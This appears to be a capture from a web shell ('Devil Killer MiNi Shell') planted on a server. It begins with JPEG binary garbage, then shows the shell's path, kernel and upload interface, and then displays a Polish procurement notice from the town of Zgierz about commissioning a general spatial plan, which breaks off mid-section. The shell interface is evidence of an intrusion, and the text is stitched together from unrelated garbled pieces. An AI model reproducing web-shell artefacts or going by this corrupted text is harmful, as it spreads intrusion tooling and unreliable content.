JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240708/0040175101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sporządzenie planu ogólnego dla miasta Zgierza </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Zgierz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472057721</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Jana Pawła II 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgierz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@umz.zgierz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.zgierz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sporządzenie planu ogólnego dla miasta Zgierza </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7eb0eb53-3869-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00401751</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00036049/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Sporządzenie Planu ogólnego dla miasta Zgierza</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/951415 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>opisane zostały w dokumencie &#34;Instrukcja dla wykonawców platformazakupowa.pl&#34; oraz w „Regulaminie platformazakupowa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: 1) ADMINISTRATOREM PANI/PANA DANYCH<br/>OSOBOWYCH jest: Prezydent Miasta Zgierza, z siedzibą w Zgierzu, plac Jana Pawła II 16, 95-100 Zgierz; 2) w sprawie ochrony<br/>swoich danych osobowych proszę skontaktować się z INSPEKTOREM OCHRONY DANYCH OSOBOWYCH pod adresem e-mail:<br/>erzad@ umz.zgierz.pl lub epuap.gov.pl skrytka epuap:/4ebn4d0m4f/skrytka; lub pisemnie na adres Urzędu Miasta Zgierza: plac<br/>Jana Pawła II 16, 95-100 Zgierz; 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego. 4) odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11<br/>września 2019 r. – Prawo zamówień publicznych , dalej „ustawa PZP”; 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z<br/>art. 78 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; 6) obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>PZP; 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do<br/>art. 22 RODO; 8) posiada Pani/Pan: - na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; -<br/>na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych 2; - na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO 3; - prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO; 9) nie przysługuje Pani/Panu: - w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; -<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; - na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UG.271.21.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia:<br/>1) przedmiotem zamówienia jest wykonanie zadania pn: Sporządzenie planu<br/>ogólnego dla miasta Zgierza;<br/>2) opis i kierunki rozwoju miasta Zgierza zostały zawarte w dokumentach<br/>podjętych Uchwałą nr LXXI/1054/2024 Rady Miasta Zgierza z dnia 25<br/>stycznia 2024r.: „Strategia Rozwoju Miasta Zgierza na lata 2023-2030 z<br/>perspektywą do roku 2040”, stanowiących załącznik do przedmiotowego<br/>opisu 3) przedmiot zamówienia należy opracować zgodnie z przepisami: ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2023 r. poz. 977 z późn. zm.), rozporządzenia Ministra Rozwoju i<br/>Technologii z dnia 8 grudnia 2023 r. w sprawie projektu planu ogólnego<br/>gminy, dokumentowania prac planistycznych w zakresie tego planu oraz<br/>wydawania z niego wypisów i wyrysów (Dz. U. z 2023 r. poz. 2758), ustawy z<br/>dnia 2 października 2008 r. o udostępnianiu informacji o środowisku i jego<br/>ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach<br/>oddziaływania na środowisko (Dz. U. z 2023 r. poz. 1094 z późn. zm.),<br/>rozporządzenia z dnia 9 września 2002 r. Ministra Środowiska w sprawie<br/>opracowań ekofizjograficznych (Dz. U. z 2002 r. poz. 155), ustawy z dnia 19<br/>lipca 2019 r. o zapewnieniu dostępności osobom ze szczególnymi potrzebami<br/>(t.j. Dz. U. z 2022 r. poz. 2240 z późn. zm.) oraz właściwymi przepisami<br/>szczególnymi; ponadto zakres zamówienia obejmuje następujące czynności m.in.:<br/>− sporządzenie opracowania ekofizjograficznego;<br/>− dokonanie inwentaryzacji urbanistycznej i oceny istniejącego stanu<br/>zagospodarowania;<br/>− przygotowanie zawiadomień właściwych instytucji o podjęciu przez Radę<br/>Miasta Zgierza uchwały o przystąpieniu do sporządzenia planu ogólnego;-przygotowanie ogłoszeń i obwieszczeń Prezydenta Miasta Zgierza<br/>wymaganych ustawą;<br/>− analizę złożonych wniosków przez osoby fizyczne i prawne oraz<br/>zgłoszone przez organy i instytucje, sporządzenie wykazu wniosków,<br/>przygotowanie propozycji ich rozpatrzenia wraz z uzasadnieniem;<br/>− sporządzenie projektu planu ogólnego wraz z uzasadnieniem i prognozą<br/>oddziaływania na środowisko (części tekstowe, graficzne, dane<br/>przestrzenne) oraz określenie obszarów uzupełnienia zabudowy;<br/>− przygotowanie występień o zaopiniowanie i uzgodnienie projektu planu<br/>ogólnego;<br/>− udział w posiedzeniach Miejskiej Komisji Architektoniczno-Urbanistycznej;<br/>− analiza i opracowanie wykazu uzyskanych uzgodnień i opinii wraz<br/>z ewentualnym wprowadzeniem korekt w projekcie planu ogólnego;<br/>− przeprowadzenie i udział w konsultacjach społecznych dotyczących<br/>projektu planu ogólnego z mieszkańcami miasta oraz udzielanie<br/>stosownych informacji i wyjaśnień;<br/>− sporządzenie analizy wniesionych uwag do projektu planu ogólnego wraz<br/>z propozycją ich rozpatrzenia oraz ewentualnym wprowadzeniem korekt<br/>do projektu planu ogólnego;<br/>− przygotowanie projektu uchwały wraz z załącznikami a także udział<br/>w posiedzeniach Komisji Rady Miasta Zgierza oraz sesji Rady Miasta<br/>Zgierza uchwalającej plan ogólny;<br/>− skompletowanie i przygotowanie dokumentacji formalno-prawnej w celu<br/>przedłożenia jej Wojewodzie Łódzkiemu,<br/>− w przypadku konieczności ponowienia procedury planistycznej<br/>Wykonawca zobowiązuje się do ponowienia niezbędnych czynności, jak<br/>również do ponownego opracowania niezbędnych dokumentów w ramach<br/>niniejszej umowy;<br/>− udział w czynnościach niezbędnych do ewentualnego doprowadzenia do<br/>zgodności projektu planu ogólnego z przepisami prawa w sytuacji<br/>stwierdzenia nieważności uchwały przez Wojewodę;<br/>− odpowiedzialność za koordynację prawidłowości przebiegu procedury<br/>planistycznej oraz na ewentualne żądanie udział w spotkaniach<br/>z Zamawiającym.<br/>Wszelkie prace projektowe lub czynności nie opisane powyżej, a wynikające<br/>z procedur określonych w ustawie oraz przepisach szczególnych, niezbędne do<br/>właściwego i kompletnego opracowania zamówienia Wykonawca winien<br/>wykonać w ramach przedmiotu zamówienia, kosztów i terminów wykonania<br/>przedmiotu zamówienia.Wykonawca przekaże Zamawiającemu:<br/>− Opracowanie ekofizjograficzne w wersji papierowej i elektronicznej –<br/>2 egzemplarze;<br/>− Plan ogólny – w wersji papierowej i elektronicznej, część tekstowa<br/>i graficzna – 4 egzemplarze;<br/>− Prognoza oddziaływania na środowisko w wersji papierowej i<br/>elektronicznej – 4 egzemplarze;<br/>− rysunek planu ogólnego w wersji elektronicznej w formacie SHP lub DXF<br/>z podziałem na warstwy, na których leżą obiekty jednej kategorii,<br/>− rysunek planu ogólnego w formacie Geotiff,<br/>− dane przestrzenne,<br/>− inne dokumenty, których potrzeba wyłoni się w trakcie opracowywania<br/>przedmiotu zamówienia w ramach niniejszej umowy.Wykonawca doręczy Zamawiającemu przedmiot zamówienia z zachowaniem<br/>struktury przedstawionej w niniejszym Opisie przedmiotu zamówienia w wersji<br/>papierowej (z zachowaniem standardów dostępności) oraz na<br/>informatycznym nośniku danych z jego zapisem w formie elektronicznej, przy<br/>czym forma elektroniczna musi spełniać wymogi ustawy o dostępności<br/>cyfrowej stron internetowych i aplikacji mobilnych podmiotów publicznych,<br/>w standardach dostępności treści internetowych WCAG 2.1 na poziomie AA,<br/>oraz ustawy o zapewnianiu dostępności osobom ze szczególnymi<br/>potrzebami, w celu umożliwienia Zamawiającemu spełnienia obowiązku<br/>zapewnienia dostępności treści własnych zasobów internetowych dla<br/>wszystkich odbiorców, zwłaszcza osób narażonych na wykluczenie cyfrowe:<br/>starszych, osób z niepełnosprawnościami (np. osób niewidomych<br/>i słabowidzących, głuchych i niedosłyszących, osób z niepełnosprawnością<br/>ruchową, z zaburzeniami mowy, nadwrażliwością na światło, osób<br/>z niepełnosprawnościami sprzężonymi), osób mających trudności w uczeniu<br/>się i ograniczenia poznawcze, pozbawionych dostępu do szerokopasmowego<br/>Internetu.Wykonawca zobowiązuje się do przeniesienia majątkowych praw autorskich do wszystkich materiałów wytworzonych w ramach realizacji przedmiotu zamówienia na Zamawiającego w ramach wynagrodzenia określonego w ofercie. Wykonawca zobowiązuje się do opracowania projektu odpowiedzi na skargi wniesione na uchwałę przyjmującą plan ogólny do Wojewódzkiego Sądu Administracyjnego i Naczelnego Sądu Administracyjnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71410000-5 - Usługi planowania przestrzennego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty zamawiający stosować będzie kryteria: cena, kary umowne, doświadczenie głównego projektanta</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kary umowne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie głównego projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej:a)	Wykonawca należycie wykonał (zakończył wykonanie) a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – co najmniej 5 usług polegających na opracowaniu miejscowego planu zagospodarowania przestrzennego lub zmian planu o powierzchni nie mniejszej niż 20 ha oraz co najmniej 2 usługi polegające na opracowaniu miejscowego planu zagospodarowania przestrzennego lub zmian planu o powierzchni nie mniejszej niż 100 ha, zakończonych publikacją w dzienniku urzędowym.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia – dokument i spełnianie warunku łączne pod warunkiem, że całe wymagane doświadczenie posiada co najmniej jeden z podmiotów.<br/>b)	Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj. co najmniej:<br/>•	jednym głównym projektantem, który spełnia co najmniej jeden z warunków zawartych w art. 5 pkt 1-3 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym oraz posiada minimum 5-letnie doświadczenie w zakresie sporządzania/opracowywania miejscowych planów zagospodarowania przestrzennego i opracował co najmniej dwa takie dokumenty;<br/>UWAGA: Warunkiem udziału w postępowaniu jest sporządzenie /opracowanie co najmniej dwóch miejscowych planów zagospodarowania przestrzennego a dodatkowe doświadczenie głównego projektanta stanowi kryterium oceny ofert opisane rozdz. XV SWZ.<br/>•	dwiema osobami, które spełniają co najmniej jeden z warunków zawartych w art. 5 pkt 1-6 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym i posiadają minimum 2-letnie doświadczenie w zakresie sporządzania/opracowywania miejscowych planów zagospodarowania przestrzennego;<br/>•	jedną osobą spełniającą co najmniej jeden z warunków zawartych w art. 74a ust. 2 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko.<br/>Zamawiający dopuszcza łączenie funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie zamierza wzywać wykonawcy, którego oferta została najwyżej oceniona, do złożenia podmiotowych środków dowodowych. Zamawiający<br/>dokona kwalifikacji podmiotowej Wykonawcy na podstawie oświadczenia z art. 125 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych:<br/>- wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> PEŁNOMOCNICTWO do reprezentowania w postępowaniu o udzielenie zamówienia – w szczególności – do podpisania oferty wraz z załącznikami – o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę. ZOBOWIĄZANIE podmiotu udostępniającego zasoby do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jeśli Wykonawca polega na tych zasobach. OŚWIADCZENIE: Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę na podstawie art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję 